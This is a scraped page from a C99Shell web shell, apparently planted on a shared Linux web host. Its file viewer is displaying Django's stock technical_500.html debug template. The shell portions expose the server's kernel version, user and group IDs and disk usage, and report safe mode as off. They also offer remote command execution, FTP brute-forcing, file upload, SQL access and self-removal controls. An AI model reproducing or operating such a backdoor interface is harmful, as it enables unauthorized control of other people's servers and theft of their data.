!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/lib/python3/dist-packages/django/views/templates/   drwxr-xr-x
Free 687.02 GB of 879.6 GB (78.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     technical_500.html (17.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %} {% if request %} at {{ request.path_info }}{% endif %} {% if not is_email %} {% endif %}

{% if exception_type %}{{ exception_type }}{% else %}Report{% endif %} {% if request %} at {{ request.path_info }}{% endif %}

{% if exception_value %}{{ exception_value|force_escape }}{% else %}No exception message supplied{% endif %}
{% if request %} {% endif %} {% if exception_type %} {% endif %} {% if exception_type and exception_value %} {% endif %} {% if lastframe %} {% endif %}
Request Method: {{ request.META.REQUEST_METHOD }}
Request URL: {{ request.get_raw_uri }}
Django Version: {{ django_version_info }}
Exception Type: {{ exception_type }}
Exception Value:
{{ exception_value|force_escape }}
Exception Location: {{ lastframe.filename }}, line {{ lastframe.lineno }}, in {{ lastframe.function }}
Python Executable: {{ sys_executable }}
Python Version: {{ sys_version_info }}
Python Path:
{{ sys_path|pprint }}
Server time: {{server_time|date:"r"}}
{% if unicode_hint %}

Unicode error hint

The string that could not be encoded/decoded was: {{ unicode_hint }}

{% endif %} {% if template_does_not_exist %}

Template-loader postmortem

{% if postmortem %}

Django tried loading these templates, in this order:

{% for entry in postmortem %}

Using engine {{ entry.backend.name }}:

    {% if entry.tried %} {% for attempt in entry.tried %}
  • {{ attempt.0.loader_name }}: {{ attempt.0.name }} ({{ attempt.1 }})
  • {% endfor %} {% else %}
  • This engine did not provide a list of tried templates.
  • {% endif %}
{% endfor %} {% else %}

No templates were found because your 'TEMPLATES' setting is not configured.

{% endif %}
{% endif %} {% if template_info %}

Error during template rendering

In template {{ template_info.name }}, error at line {{ template_info.line }}

{{ template_info.message }}

{% for source_line in template_info.source_lines %} {% if source_line.0 == template_info.line %} {% else %} {% endif %} {% endfor %}
{{ source_line.0 }} {{ template_info.before }}{{ template_info.during }}{{ template_info.after }}
{{ source_line.0 }} {{ source_line.1 }}
{% endif %} {% if frames %}

Traceback{% if not is_email %} Switch to copy-and-paste view{% endif %}

    {% for frame in frames %} {% ifchanged frame.exc_cause %}{% if frame.exc_cause %}
  • {% if frame.exc_cause_explicit %} The above exception ({{ frame.exc_cause|force_escape }}) was the direct cause of the following exception: {% else %} During handling of the above exception ({{ frame.exc_cause|force_escape }}), another exception occurred: {% endif %}

  • {% endif %}{% endifchanged %}
  • {% if not frame.tb %} {% if forloop.first %}None{% else %}Traceback: None{% endif %} {% else %} {{ frame.filename }}, line {{ frame.lineno }}, in {{ frame.function }} {% endif %} {% if frame.context_line %}
    {% if frame.pre_context and not is_email %}
      {% for line in frame.pre_context %}
    1. {{ line }}
    2. {% endfor %}
    {% endif %}
    1. {{ frame.context_line }}
      {% if not is_email %} {% endif %}
    {% if frame.post_context and not is_email %}
      {% for line in frame.post_context %}
    1. {{ line }}
    2. {% endfor %}
    {% endif %}
    {% endif %} {% if frame.vars %}
    {% if is_email %}

    Local Vars

    {% else %} Local vars {% endif %}
    {% for var in frame.vars|dictsort:0 %} {% endfor %}
    Variable Value
    {{ var.0 }}
    {{ var.1 }}
    {% endif %}
  • {% endfor %}
{% if not is_email %}


{% endif %} {% endif %}

Request information

{% if request %} {% if user_str %}

USER

{{ user_str }}

{% endif %}

GET

{% if request.GET %} {% for k, v in request_GET_items %} {% endfor %}
Variable Value
{{ k }}
{{ v|pprint }}
{% else %}

No GET data

{% endif %}

POST

{% if filtered_POST_items %} {% for k, v in filtered_POST_items %} {% endfor %}
Variable Value
{{ k }}
{{ v|pprint }}
{% else %}

No POST data

{% endif %}

FILES

{% if request.FILES %} {% for k, v in request_FILES_items %} {% endfor %}
Variable Value
{{ k }}
{{ v|pprint }}
{% else %}

No FILES data

{% endif %} {% if request.COOKIES %} {% for k, v in request_COOKIES_items %} {% endfor %}
Variable Value
{{ k }}
{{ v|pprint }}
{% else %}

No cookie data

{% endif %}

META

{% for var in request_meta.items|dictsort:0 %} {% endfor %}
Variable Value
{{ var.0 }}
{{ var.1|pprint }}
{% else %}

Request data not supplied

{% endif %}

Settings

Using settings module {{ settings.SETTINGS_MODULE }}

{% for var in settings.items|dictsort:0 %} {% endfor %}
Setting Value
{{ var.0 }}
{{ var.1|pprint }}
{% if not is_email %}

You’re seeing this error because you have DEBUG = True in your Django settings file. Change that to False, and Django will display a standard page generated by the handler for this status code.

{% endif %}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0118 ]--